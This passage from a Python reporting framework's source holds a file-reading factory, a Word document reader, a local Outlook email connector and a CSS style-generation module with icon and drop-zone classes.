def jsEvent(self, debug=None):
"""
:category: Dataframe
:rubric: JS
:type:
:dsc:
:return: The Javascript string corresponding to the refresh of the different components
"""
jsGenerateFncs = []
for obj in self.aresObj.jsSources[self.htmlCode]['containers']:
jsGenerateFncs.append(obj.jsGenerate())
return self.aresObj.jsPost(self.dataSrc['url'], jsFnc=["%s = data" % self.htmlCode] + jsGenerateFncs, debug=debug)
def html(self):
jsGenerateFncs = []
for obj in self.aresObj.jsSources[self.htmlCode]['containers']:
jsGenerateFncs.append(obj.jsGenerate())
if self.dataSrc.get('on_init', False):
self.aresObj.jsOnLoadFnc.add(self.aresObj.jsPost(self.dataSrc['url'], jsFnc=["%s = data" % self.htmlCode] + jsGenerateFncs))
return ''
class AresFile(object):
"""
:category: Default
:rubric: PY
:type: File
:dsc:
Unique interface for files in AReS. A factory will read the file according to the extension but
"""
__fileExt, _extPackages = None, None
label = ''
def __init__(self, data=None, filePath=None, htmlCode=None, aresObj=None):
self.pkgs = {}
if self._extPackages is not None:
for name, package in self._extPackages:
self.pkgs[name] = requires(name, reason='Missing Package', install=package, autoImport=True, sourceScript=__file__)
self.aresObj, self.filePath, self.htmlCode, self._ares_data = aresObj, filePath, htmlCode, data
_, self.fileExtension = os.path.splitext(self.filePath) if filePath is not None else (None, None)
self.path, self.filename = os.path.split(filePath) if filePath is not None else (None, None)
@property
def exists(self):
return os.path.exists(self.filePath)
@property
def timestamp(self):
if self.exists:
return time.strftime("%Y%m%d_%H%M%S", time.gmtime())
def get(self, fileFamily=None, delimiter=None, **kwargs):
"""
:category:
:rubric:
:type:
:dsc:
:return:
"""
if delimiter == -1:
return self
facts = loadFactory()
if self._ares_data is not None:
# Force the use of Pandas in this case
return facts[".csv"](data=self._ares_data, filePath=self.filePath, aresObj=self.aresObj, htmlCode=self.htmlCode, **kwargs)
if fileFamily is not None:
return facts[fileFamily](data=self._ares_data, filePath=self.filePath, aresObj=self.aresObj, htmlCode=self.htmlCode, **kwargs)
if self.fileExtension.lower() in facts:
return facts[self.fileExtension](data=self._ares_data, filePath=self.filePath, aresObj=self.aresObj, htmlCode=self.htmlCode, **kwargs)
return self
def _read(self, toPandas=False, **kwargs):
"""
"""
return open(self.filePath)
def read(self, toPandas=False, **kwargs):
"""
"""
self._ares_data = self._read(toPandas, **kwargs)
return self._ares_data
def setFolder(self):
"""
"""
if not os.path.exists(self.path):
os.makedirs(self.path)
def write(self, data, **kwargs):
"""
:category:
:rubric:
:type:
:dsc:
:return:
"""
pass
def writeTo(self, fileFamily, filePath=None):
"""
"""
facts = loadFactory()
if fileFamily.lower() in facts:
if filePath is None:
filePath = self.filePath.replace( self.fileExtension, fileFamily)
newFile = facts[fileFamily](filePath)
def html(self):
print(' Not yet implement for bespoke files')
return ""
def docEnum(aresObj, outStream, lang='eng'):
"""
"""
for ext, aresClass in loadFactory().items():
outStream.link(
" **%s** | %s" % (ext, aresClass.label.strip()), "api?module=file&alias=%s" % ext, cssPmts={"margin": "5px"})
if __name__ == '__main__':
file = AresFile(r'D:\youpi.json').get()
#value = {"grerg": "vergerg", "rvr": 2}
#file.write(value)
data = file.read()
#file = AresFile(r'D:\testimports\testScript.py').get()
#print file.read().DSC
file = AresFile(r'D:\BitBucket\Youpi-Ares\user_reports\EFEE\doc\index.amd').get()
data = file.read()
file.write(data)
#data = AresJsData.JsDataFrame(None, None, None, "\t", None, None, None, None, None, None, '.')
#file.write(data)
```
#### File: connectors/files/AresFileWord.py
```python
from ares.Lib.connectors.files import AresFile
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_docx = requires("docx", reason='Missing Package', install='python-docx', sourceScript=__file__)
class FileWord(AresFile.AresFile):
"""
:category: Connector
:rubric: PY
:type: class
:label: Connector to read a bespoke PDF file.
:dsc:
Connector to read a bespoke PDF file.
From this connector there is also some features in order to ask the framework to "digest" the files in order to enrich the search engine with metadata.
At this stage we are more working on the collection of metadata but the search engine will then leverage on all these information
This module to work need a Python package called PyMuPDF. To install it you can run the command pip install PyMuPDF.
Once this available to your Python environment this connector will work fine.
If you want to check the connector please click [here](/api?module=connector&alias=PDF)
:link PyMuPDF Documentation: https://pymupdf.readthedocs.io/en/latest/tutorial/
"""
__fileExt = ['.doc', '.docx']
label = "Interface to deal with Word documents"
def _read(self, **kwargs):
doc = open(self.filePath, 'rb')
document = ares_docx.Document(doc)
doc.close()
return [para.text for para in document.paragraphs]
if __name__ == '__main__':
pdfObj = FileWord(r'D:\ficheProjet.docx')
print( pdfObj.read() )
```
#### File: connectors/models/TableauDbModels.py
```python
import sqlalchemy
class Model(object):
"""
"""
@staticmethod
def test():
"""
:return:
"""
return [sqlalchemy.Column('test', sqlalchemy.String(100), primary_key=True)]
```
#### File: connectors/sources/AresConnOutlook.py
```python
DSC = {
'eng':
'''
:dsc:
Generic Connector to retrieve data from an Outlook open application.
This script will parse the emails of the selected set of folders. Not all the mailbox will be scanned by default.
For security reason this connector does not work on server mode in order to avoid interacting with the mail box of the
server. This could be used to locally retrieve information and then feed a centralise database.
The idea of this connector is to put in place specialised nodes in the network to get specific information and only the results
will be shared
'''
}
from ares.Lib.connectors import AresConn
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_pywin32 = requires("win32com.client", reason='Missing Package', install='pywin32', sourceScript=__file__)
class AresConnOutlook(AresConn.AresConn):
"""
:category: Outlook
:rubric: PY
:type: Connector
:example: print(aresObj.getData('OUTLOOK', {'folders': ['Example']}))
:Link Documentation: https://www.codementor.io/aliacetrefli/how-to-read-outlook-emails-by-python-jkp2ksk95
:dsc:
Connector to retrieve emails from an open Outlook session.
The list of folders to be read should be defined by default no folders will be used to extract emails.
This could be a way to retrieve data from a mailing list to produce KPI
"""
ALIAS = 'OUTLOOK'
@classmethod
def isCompatible(cls, params):
global ares_pywin32
if not params['is_local']:
return (False,
'<i class="fas fa-times-circle"></i> Oulook connector cannot be used if script is not done locally')
if ares_pywin32 is None:
ares_pywin32 = requires("win32com.client", reason='Missing Package', install='pywin32', autoImport=True, sourceScript=__file__)
if ares_pywin32 is not None:
return (True, '<i class="far fa-check-square"></i> Available')
return (False, '<i class="fas fa-times-circle"></i> Credential missing <a style="color:red;text-decoration:underline;font-weight:bold;" href="/admin/account">Account Settings</a>')
@classmethod
def _getData(cls, params, sourceDef=None, **kwargs):
emails = []
outlook = ares_pywin32.Dispatch("Outlook.Application").GetNamespace("MAPI")
accounts = ares_pywin32.Dispatch("Outlook.Application").Session.Accounts;
for account in accounts:
inbox = outlook.Folders(account.DeliveryStore.DisplayName)
folders = inbox.Folders
for folder in folders:
if not str(folder) in params['folders']:
continue
messages = folder.Items
if len(messages) > 0:
for message2 in messages:
try:
sender = message2.SenderEmailAddress
subject = message2.Subject
content = message2.Body
date = message2.SentOn.strftime("%d-%m-%y")
if sender != "":
emails.append({'to': sender, 'subject': subject, 'body': content, 'date': date})
except:
print("Error")
print(account.DeliveryStore.DisplayName)
pass
return emails
```
#### File: Lib/css/CssBase.py
```python
DSC = {
'eng': '''
:category: CSS Framework Design
:rubric: PY
:dsc:
## CSS Framework

CSS generator, this module will make easier the addition of CSS classes and also will allow the creation of themes
4 CSS Levels according to the need. None all of them can be overridden without impacting the whole framework.
All the CSS configurations are using Python dictionaries based on any existing keys and values defined in the CSS standards [CSS W3C Documentation](https://www.w3schools.com/css/)
You can also get more details about this [here](https://www.w3.org/standards/webdesign/htmlcss)
**Please do not override or change any function starting with __**. If it is really needed please contact us before working on
your report. Those functions are intended to be internal functions that any child class should never need directly
### CSS Level 1
Parameters defined in the signature of the methods calls in Ares.py
This level of CSS is very bespoke and users are invited to override them in the report directly by using the different
standardised keywords. For example:
- Color is used for the font-color CSS properties
- size for the font-size
...
You can validate your CSS Style [here](https://validator.w3.org/#validate_by_input)
Default values are common in the framework anyway. Those parameter are optional.
For example the below will change the color in the first record and the font size on the second one.
```python
aresObj.tabs([{'value': 'Fraise', 'key': 'Fraise', 'color': 'blue', 'isActive': True}, {'value': 'Apple', 'key': 'Apple', 'size': 20}])
```
### CSS Level 2
Parameters defined in the HTML Structure. please have a look at the documation in AresHtml.py for more details
about the HTML framework. The idea of this layer is not to be overridden. Basically here it mainly style attributes in the
different HTML tags and those attributes are mandatory for the correct display of the HTML element.
Usually this CSS layer is not used in the simple HTML components. It is more likely used in the nested component to ensure
a correct structure
For example in the textBubble HTML String function it is defined:
```markdown
style="padding-top:5px;margin-left:5px;text-align:center;background-color:white"
```
### CSS Level 3
Python classes defined in the different CSS modules. Those modules can be used dynamically from the HTML component
using the method addPyCss then be defining the class in the corresponding HTML element. Those CSS style will be written directly by
python and it will add on the fly the needed CSS classes in the report header. This in the future will help use in selecting the
correct style (and it should be the most often used)
For example in the Slider class it is added the Python CSS Style CssSubTitle
```python
self.aresObj.jsOnLoadFnc.add('%s.slider({value: %s});' % (self.jqId, self.vals))
if self.title is not None:
self.aresObj.cssObj.add('CssSubTitle')
```
### CSS Level 4
Pure CSS Style coming from existing framework. For example [Bootstrap](https://getbootstrap.com/docs/3.3/css/) is coming with its complete suite of styles
and you can directly use then by defined the class name in the method addClass of your HTML component. Going forward this 4th CSS
usage should be reduced and the python layer should automatically generate CSS Styles for each report
For example in List ze use the Bootstrap styles
```python
class List(AresHtml.Html):
cssCls = ['list-group']
```
'''
}
import os
import sys
import json
import collections
import logging
from ares.Lib import AresMarkDown
from ares.Lib.css import CssBaseColor
# The factor with all the different CSS classes available
# This can be reloaded if a new one is added
factory = None
def load(forceReload=False):
""" Load the factory with the all the different CSS classes defined in the framework """
global factory
if factory is None or forceReload:
path = os.path.abspath(__file__)
dirPath = os.path.dirname(path)
sys.path.append(dirPath)
tmpFactory = {}
for pyFile in os.listdir(dirPath):
if pyFile == 'CssBase.py':
continue
if pyFile.endswith(".py") and pyFile != '__init__.py':
try:
pyMod = __import__(pyFile.replace(".py", ""))
for name in dir(pyMod):
if name.startswith("Css"):
tmpFactory[str(name)] = {'class': getattr(pyMod, name), 'file': pyFile}
except Exception as e:
# unexpected issue in the factor (A new class might be wrong)
logging.warning(e)
# TODO: Think about a better implementation
# Atomic action to update the factor
# the above if statement should remain very quick as it might be a source of synchronisation issues in the future
factory = tmpFactory
return factory
def convertCss(content, isMin=False, fomatted=False):
"""
:category: CSS Converter
:type: Style
:rubric: PY
:dsc:
Translate the CSS structure to the CSS Ares expected format.
The result of this function is done in the console. This function should not be used if you cannot see the print on the console.
"""
import re
cssResults = collections.defaultdict(list)
pattern = re.compile("[\n\t ]*([a-zA-Z-0-9:\\n\\t\,._ ]*){([a-zA-Z0-9;:()/\\n\\t-._ ]*)}", re.IGNORECASE | re.DOTALL | re.MULTILINE)
for match in pattern.finditer(content):
cssIdRaw, cssContent = match.groups()
cssIds = cssIdRaw.split(',')
cssContent = cssContent.replace("\t", " ")
for line in cssContent.split("\n"):
cleanLine = line.strip()
if cleanLine:
attr, value = cleanLine.split(":")
value = value.strip().replace(";", "")
for cssId in cssIds:
cssResults[cssId.strip()].append({'attr': attr, 'value': value})
for key, vals in cssResults.items():
print(key)
if fomatted:
for val in vals:
print(val)
else:
print(key, vals)
class CssStyle(list):
"""
:category: CSS
:rubric: PY
:type: constructor
:dsc:
This is proxy class to a list dedicated to monitor the CSS classes
The use of this class will help to manage the different possible attributes
but also to be able going forward to add more flexibility
"""
attrs = None
def append(self, paramsCss):
"""
:category: CSS Style Builder
:rubric: PY
:type: style
:example: >>> cssObj.append( {'attr': 'color'} )
:dsc:
Add parameters to the CSS Style generated from Python
:link CSS Class Documentation: https://www.w3schools.com/html/html_classes.asp
"""
if self.attrs is None:
self.attrs = set()
self.attrs.add(paramsCss['attr'])
super(CssStyle, self).append(paramsCss)
def update(self, params):
"""
:category: CSS Style Builder
:rubric: PY
:type: style
:example: >>> cssObj.update( {"color": "red"} )
:dsc:
Update an existing attribute to a Python CSS class
:link CSS Class Documentation: https://www.w3schools.com/html/html_classes.asp
"""
if self.attrs is None:
for attr, val in params.items():
self.append({'attr': attr, 'value': val})
else:
for attr, val in params.items():
if attr in self.attrs:
for rec in self:
if rec['attr'] == attr:
rec['value'] = val
break
else:
self.append({'attr': attr, 'value': val})
class CssObj(object):
"""
:category: CSS / Python Collection
:rubric: PY
:dsc:
CSS Object is the main Python wrapper used to create the on the fly CSS files
The idea will be to use this as the bespoke CSS file in a report. There will be nothing done outside of python in this
framework. Everything like CSS or Javascript will be automatically generated and defined from the components used in the
reports.
"""
minify = False # https://en.wikipedia.org/wiki/Minification_(programming)
def __init__(self, aresObj=None):
""" Instantiate the object and also load the CSS Python factory """
self.__factory, self.aresObj = load(), aresObj
self.cssStyles, self.cssBespoke = {}, {}
# The below dictionary is the only one used in the CSS Framework to set the colors
# This can be changed in order to get different color charts in a bespoke environment
self.colorCharts, self.cssMaker = {}, CssBaseColor.CssColorMaker(aresObj)
# TODO: Remove this special logic
self._charts = list(self.cssMaker.charts)
for color in self.cssMaker.colors:
self.colorCharts.setdefault( color['type'], []).append( color['color'])
self.__bespokeAttr = collections.defaultdict(dict)
def help(self, category=None, rubric=None, type=None, value=None, enum=None, section=None, function=None, lang='eng', outType=None):
outStream = AresMarkDown.DocCollection(self.aresObj)
if enum == 'colors':
outStream.title("Pre defined colors", cssPmts={"margin-left": "5px", "font-size": "30px", "font-variant": "small-caps"})
outStream.append("Colors used in AReS are based on hexadecimal codes. You can find the definition here: [W3C colors website](https://www.w3schools.com/colors/colors_hexadecimal.asp)")
outStream.hr()
CssBaseColor.docEnum(self.aresObj, outStream, lang)
outStream.hr()
outStream.title("Definition", level=2)
if hasattr(CssBaseColor, 'DSC'):
docSection = AresMarkDown.AresMarkDown.loads(
CssBaseColor.DSC.get('eng', CssBaseColor.DSC.get('eng', '')))
outStream.add(docSection, 'dsc')
elif enum == 'styles':
outStream.title("CSS Styles in AReS Components", level=2)
data = []
for alias, cssCls in load().items():
docDetails = AresMarkDown.AresMarkDown.loads(cssCls['class'].__doc__)
data.append( [alias, cssCls['file'], docDetails.getAttr('dsc').strip()] )
outStream.table(['pyCSS Class', 'Module', 'Description'], data, pmts={"searching": 'True'})
outStream.src(__file__)
outStream.export(outType)
def ovr(self, pyMod):
"""
:category: CSS / Python Overrides
:rubric: PY
:dsc:
This will go thought all the classes in the module to try to override the ones defined in the framework.
This entry is a shortcut to change CSS Styles without having to update the main framework.
Those changes will only impact the current report.
:tip:
If you create a module CssOvr.py in the root of your environment, all the CSS Classes will be automatically
loaded and if some already existing in the framework, they will be overridden.
"""
for name in dir(pyMod):
if name.startswith("Css") and name != 'CssBase':
self.cssBespoke[str(name)] = getattr(pyMod, name)
def addPy(self, pyCssCls):
"""
:category: Css Classes
:rubric: PY
:type: Framework Extension
:dsc:
Add a bespoke class to the CSS Style Factory. This class is added on the fly and it cannot override an existing one.
"""
cssCls = type(pyCssCls.__name__, (pyCssCls, CssCls), {})
if not pyCssCls.__name__ in self.__factory:
self.__factory[pyCssCls.__name__] = {'class': cssCls, 'file': 'external (%s)' % self.aresObj.run.report_name}
self.add(pyCssCls.__name__)
def addCls(self, clsName, params):
"""
:category: CSS / Python Collection
:rubric: PY
:dsc:
Function to define a CSS class on the fly from the Python layer.
:return: The Python CssCls object
"""
styles = [{'attr': key, 'value': val} for key, val in params.items()]
self.cssBespoke[clsName] = type(clsName, (CssCls, ), dict(__style=[]))()
self.cssBespoke[clsName].style = styles
self.cssStyles.update(self.cssBespoke[clsName].getStyles())
return self.cssBespoke[clsName]
def change(self, cssCls, name, value):
"""
:category: CSS / Python Overrides
:rubric: PY
:dsc:
Store the attributes to be changed / overridden for a given class
"""
self.__bespokeAttr[cssCls][name] = value
def reload(self):
"""
:category: CSS function
:rubric: PY
:dsc:
Force the CSS cache to be refreshed.
This should never be used locally as a simple change in the code will refresh all the caches as Flask will automatically restart
"""
self.__factory = load(forceReload=True)
def get(self, clsName):
"""
:category: CSS function
:rubric: PY
:dsc:
Returns the CSS attributes for a given Python class Name
:return: The Python CSS Object
"""
pyCss = self.cssBespoke[clsName] if clsName in self.cssBespoke else self.__factory.get(clsName, {}).get('class', None)
return pyCss
def add(self, clsName, htmlId=None, htmlTag=None, htmlType=None, cssRef=None):
"""
:category: CSS function
:rubric: PY
:dsc:
Add the Python Class to the report CSS objects. The bespoke style overrides will be applied first. The default are the
standard styles defined in the root of the CSS module
:return: The Python CSS Id (defined from the method setId in CssCls)
"""
cssMod = self.__factory.get(clsName, {}).get('class', None) if not clsName in self.cssBespoke else self.cssBespoke[clsName]
if cssMod is None:
return None
pyCss = cssMod(htmlId=htmlId, htmlTag=htmlTag, htmlType=htmlType, cssRef=cssRef)
pyCss.colorCharts = self.colorCharts
if clsName in self.__bespokeAttr:
for name, value in self.__bespokeAttr[clsName].items():
pyCss.update(name, value)
self.cssStyles.update(pyCss.getStyles())
return pyCss.cssId
def __str__(self):
"""
:category: CSS function
:rubric: PY
:dsc:
This function will be in charge of producing the best CSS content according to the need.
If minify is set to true it will have to try to create groups and to aggregate the data before writing a one liner
:return: The String with all the CSS classes and definition
"""
if self.minify:
return "".join([ "%s %s" % (key, val) for key, val in self.cssStyles.items() if val != '{}'])
# no need for performance in the web report, certainly an investigation
return "\n".join(["%s %s" % (key, val) for key, val in self.cssStyles.items() if val != '{}'])
def getStyle(self, clsName):
"""
:category: CSS function
:rubric: PY
:dsc:
Get the CSS Attributes for a given Python CSS Class Name
:return: Return a String representing the CSS Attributes for a given Python CSS Class Name
"""
if clsName in self.cssBespoke:
return self.cssBespoke[clsName](None).getStyles().values()[0][1:-1]
return self.__factory[clsName]['class'](None).getStyles().values()[0][1:-1]
def pyRef(self, clsName):
"""
:category: CSS function
:rubric: PY
:dsc:
Convert the CSS Class Name to a standardized Class Name within this Python Framework
:return: A string with the CSS converted name
"""
return 'py_%s' % clsName.lower()
def getClsTag(self, clsNames):
"""
:category: HTML function
:rubric: PY
:dsc:
Create the CSS Tag to be added to the HTML Element to consider the different classes.
This will only add a class tag with the list of class names defined.
:return: A string with the HTML Class information to add to the element
"""
return 'class="%s"' % " ".join([self.pyRef(clsName) for clsName in clsNames])
class CssCls(object):
""" CSS Base class of all the derived styles
:category: CSS Class
:rubric: CSS
:dsc:
Main class to create from the Python CSS Framework well defined CSS Fragment which will be added to the page.
Each CSS Class create will produce a Class Name and it will be the one used in all the AReS components to set the Style.
This module will only consider the Static CSS classes and all the bespoke CSS Style used to defined more specifically a component will
be defined either in the string method of the component (old way) or in the jsStyle variable of the component (new way)
:TODO:
work on a way to optimize the CSS String generated in the header
example: http://www.cssportal.com/css-optimize/
"""
# This is a private function and it is not supposed to be updated
# please use the variable style in the class for any change
# It should be transformed ONLY in this class
# The structure of the dictionaries is using attr and value to be able to add some special
# keys in the future.
__style = None
reqCss = None # List of CSS Configurations required
preceedTag, parentTag, childrenTag, directChildrenTag, htmlTag = None, None, None, None, None
cssId = None # CSS Id
# Default values for the style in the web portal
colors10 = ['#5dd45d'] # the different colors used as reference in the framework
fontSize, headerFontSize = '14px', '18px'
# State variables, should have the same structure than __style
# Those variables are the ones used directly so please do not change then
# we usse static variables to nake it easier to retrieve in the editor
# target is not implemented and this feature is done in the javascript
hover, active, checked, disabled, empty, enabled, focus, link, visited = 9 * [None]
# Item CSS selector, should also have the sa,e structure than __style
before, after = None, None
childKinds = None
def __init__(self, htmlId=None, htmlTag=None, htmlType=None, cssRef=None):
""" Instantiate a CSS object with the different possible classes to be used in the style of the components
"""
if self.htmlTag is not None:
htmlTag = self.htmlTag
self.setId(htmlId=htmlId, htmlTag=htmlTag, htmlType=htmlType, cssRef=cssRef)
self.style = CssStyle()
for l in getattr(self, "_%s__style" % self.__class__.__name__, {}):
self.style.append(dict(l))
# To add some special features required for this component.
# This is to avoid having to put multiple times the same line of CSS in each class
# This will simplify a lot the testing
if self.reqCss is not None:
for css in self.reqCss:
for l in getattr(css, "_%s__style" % css.__name__, []):
self.style.append(dict(l))
# Store the different CSS Styles defined in the python layer to dictionaries
# This will allow the fact that some bespoke configuration can inherit from the main configuration
# but some special attributes might be overidden.
# It is not possible to change this differently from the components as it is supposed to be
# static and it will be used as a text file in the future
# If more overrides are needed please use the function .css() available in the components
# or talk to your IT team in charge of this framework
self.eventsStyles = {}
for state in ['hover', 'active', 'checked', 'disabled', 'empty', 'enabled', 'focus', 'link', 'visited', 'after', 'before']:
if getattr(self, state, None) is not None:
self.eventsStyles[state] = CssStyle()
for rec in getattr(self, state):
self.eventsStyles[state].append(dict(rec))
# To add CSS Style link tr:nth-child(even)
if self.childKinds is not None:
if not isinstance(self.childKinds, list):
self.childKinds = [self.childKinds]
for childKind in self.childKinds:
childValue = "%(type)s%(value)s" % childKind
self.eventsStyles[childValue] = CssStyle()
for rec in childKind['style']:
self.eventsStyles[childValue].append(dict(rec))
def customize(self, style, eventsStyles):
"""
:category: CSS Class override
:rubric: CSS
:dsc:
Function defined to override or define the static CSS parameters when an CSS Style python object is instanciated.
This will allow for example to define the color according to the standard ones without hard coding them.
In the base class this method is not defined
"""
pass
# -------------------------------------------------------------------------------
# CSS SELECTORS
#
# https://www.w3schools.com/cssref/css_selectors.asp
# -------------------------------------------------------------------------------
def __states(self):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
Function used to define for a given class name all the different mouse and event properties that the CSS could allowed.
This private method will check the static definition and create the entry in the Python CSS Class.
This will allow to define in the framework some events like hover, focus...
Only the following selector are defined so far ('hover', 'active', 'checked', 'disabled', 'empty', 'enabled', 'focus', 'link', 'visited', 'after', 'before')
:link W3C Documentation: https://www.w3schools.com/cssref/css_selectors.asp
:link W3C Hover example: https://www.w3schools.com/cssref/sel_hover.asp
"""
cssEvent = {}
for state, cssRecord in self.eventsStyles.items():
if state in ['before', 'after']:
cssEvent["%s::%s" % (self.cssId, state)] = self.cssData(cssRecord)
else:
cssEvent["%s:%s" % (self.cssId, state)] = self.cssData(cssRecord)
return cssEvent
# -------------------------------------------------------------------------------
# CSS ID SYNTHAX
#
# https://www.w3schools.com/css/css_syntax.asp
# -------------------------------------------------------------------------------
def ispreceedBy(self, tag):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
Tag at the same level but defined just before this one
"""
self.preceedTag = tag
def hasParent(self, parentTag):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
HTML tag parent of this one. For example TR is parent of TD
"""
self.parentTag = parentTag
def addChildrenTags(self, tags):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
HTML tags children of this one. For example TR is parent of TD
"""
if self.childrenTag is None:
self.childrenTag = tags
else:
self.childrenTag.extend(tags)
@property
def classname(self):
"""
:category: CSS function
:rubric: PY
:dsc:
Property to convert the CSS Class Name to a standardized Class Name within this Python Framework
:return: A string with the converted name
"""
return "py_%s" % self.__class__.__name__.lower()
def setId(self, htmlId=None, htmlTag=None, htmlType=None, cssRef=None):
"""
:category: CSS function
:rubric: PY
:dsc:
Global method to define the CSS ID for a given CSS Configuration class
:return: The CSS Id as a String
"""
if cssRef:
# Shortcut to set direcly the name of the CSS class
self.cssId = cssRef
return cssRef
cssIdParts = []
if self.parentTag is not None:
cssIdParts.append("%s > " % self.parentTag)
elif self.preceedTag is not None:
cssIdParts.append("%s ~ " % self.preceedTag)
# Special case when the style is very specific to one item in the page
if htmlId is not None:
cssIdParts.append("#%s" % htmlId)
else:
# Default behaviour as the framework will directly attach html classes
# to CSS styles defined in this python framework
if htmlTag is not None:
if htmlTag.startswith(":"):
cssIdParts.append(".%s%s" % (self.classname, htmlTag))
else:
cssIdParts.append("%s.%s" % (htmlTag, self.classname))
else:
cssIdParts.append(".%s" % self.classname)
# Extra feature if a HTML tag type is defined
# for example all the html objects with a name defined as youpi [name=youpi]
if htmlType is not None:
cssIdParts.append("[%s=%s]" % (htmlType[0], htmlType[1]))
self.cssId = ''.join(cssIdParts)
return self.cssId
def add(self, attr, value):
"""
:category: CSS Style Builder
:rubric: PY
:example: add('color', 'blue')
:dsc:
Add a Style to the CSS object
"""
self.style.append({'attr': attr, 'value': value})
def update(self, cssObj):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Override the CSS style attributes with the new CSS object
"""
self.style.update(cssObj.style)
def cssData(self, paramsCss):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Convert a Python CSS Class to a well defined CSS Class
:return: Returns the Python dictionary in a CSS format
"""
# Function to override some parameters
self.customize(self.style, self.eventsStyles)
return "{%s}" % "; ".join(["%(attr)s:%(value)s" % css for css in paramsCss])
def getStyles(self, cssId=True):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Function to process the Static CSS Python configuration and to convert it to String fragments following the CSS Web standard.
:return: A Python dictionary with all the different styles and selector to be written to the page for a given Python CSS Class
"""
res = {}
if self.childrenTag is not None:
res["%s %s" % (self.cssId, self.childrenTag)] = self.cssData(self.style)
for key, val in self.__states().items():
skey = "::" if "::" in key else ":"
splitKey = key.split(skey)
res["%s %s%s%s" % (splitKey[0], self.childrenTag, skey, splitKey[1])] = val
elif self.directChildrenTag is not None:
res["%s > %s" % (self.cssId, self.directChildrenTag)] = self.cssData(self.style)
for key, val in self.__states().items():
skey = "::" if "::" in key else ":"
splitKey = key.split(skey)
res["%s > %s%s%s" % (splitKey[0], self.directChildrenTag, skey, splitKey[1])] = val
else:
res[self.cssId] = self.cssData(self.style)
res.update(self.__states())
return res
def getStyleId(self, htmlRef):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Produce based on the CSS Python classes the correct CSS Name
return: Returns the CSS part to be written in the page by HTML tag
"""
htmlId = "#%s" % htmlRef
cssData = str(self)
if htmlId in self.cssObj.cssStyles:
if self.cssObj.cssStyles[htmlId] != cssData:
raise Exception("CSS style conflict for %s" % htmlRef)
self.cssObj.cssStyles[htmlId] = cssData
def getStyleTag(self, htmlTag):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Produce based on the CSS Python classes the correct CSS Name
return: Returns the CSS part to be written in the page by HTML tag
"""
self.cssObj.cssStyles[htmlTag] = self.cssData(self.style)
def getStyleCls(self, clss, htmlType=None):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Produce based on the CSS Python classes the correct CSS Name with the right class selector
return: Returns the CSS part to be written in the page by class name
:link W3C Documentation: https://www.w3schools.com/cssref/sel_class.asp
"""
if htmlType is not None:
self.cssObj.cssStyles["%s.%s" % (htmlType, clss)] = self.cssData(self.style)
else:
self.cssObj.cssStyles[".%s" % clss] = self.cssData(self.style)
def getStyleName(self, htmlType, name):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Add the CSS Fragment for a very bespoke CSS configuration based on HTML item names.
This can be used when only some components with the tag (or not) are impacting by a CSS Style
:return: Returns the CSS part to be written in the page by class name
"""
self.cssObj.cssStyles["%s[name='%s']" % (htmlType, name)] = self.cssData(self.style)
def update(self, name, value):
"""
:category: CSS Style Builder
:rubric: PY
:dsc:
Update or extend the CSS attribute of a python CSS class.
Please make sure that the properties you want to override are not part of the object signature.
The object parameters are the last overrides, so they will remove your changes
"""
for attrDate in self.style:
if attrDate['attr'] == name:
attrDate['value'] = value
break
else: # Append a new property
self.style.append( {"attr": name, 'value': value})
def __str__(self):
"""
:category: CSS
:rubric: JS
:dsc:
Return je CSS dictionary which could be used by the Jquery module directly.
:return: A Javascript dictionary as a string python object
"""
return "{%s}" % ", ".join([ "%s: %s" % (s['attr'], json.dumps(s['value'])) for s in self.style])
def to_dict(self):
"""
:category: CSS
:rubric: PY
:dsc:
Return the Python dictionary with the CSS attributes
:return: The Style dictionary
"""
return dict([(s['attr'], s['value']) for s in self.style])
```
#### File: Lib/css/CssDrop.py
```python
import CssBase
class CssDropFile(CssBase.CssCls):
__style = [
{'attr': 'text-align', 'value': 'center'},
{'attr': 'padding', 'value': '5px'},
{'attr': 'margin', 'value': '5px 0 10px 0'}
]
def customize(self, style, eventsStyles):
""" Enhance the different static configurations """
style.update({'border': '1px dashed %s' % self.colorCharts['blueColor'][11], 'color': self.colorCharts['blueColor'][11]})
```
#### File: Lib/css/CssIcon.py
```python
import CssBase
class CssStdIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 20px'},
{'attr': 'font-size', 'value': '20px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['blueColor'][6]} )
eventsStyles['hover'].update( {"color": self.colorCharts['blueColor'][7]} )
class CssSmallIcon(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 15px'},
{'attr': 'font-size', 'value': '10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
eventsStyles['hover'].update( {"color": self.colorCharts['blueColor'][7]} )
class CssSmallIconRigth(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 15px'},
{'attr': 'font-size', 'value': '10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'float', 'value': 'right'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
eventsStyles['hover'].update( {"color": self.colorCharts['blueColor'][7]} )
class CssSmallIconRed(CssBase.CssCls):
__style = [
{'attr': 'display', 'value': 'inline-block'},
{'attr': 'margin', 'value': '0 0 0 15px'},
{'attr': 'font-size', 'value': '10px'},
{'attr': 'cursor', 'value': 'hand'},
{'attr': 'cursor', 'value': 'pointer'},
]
hover = []
def customize(self, style, eventsStyles):
style.update( {"color": self.colorCharts['redColor'][1]} )
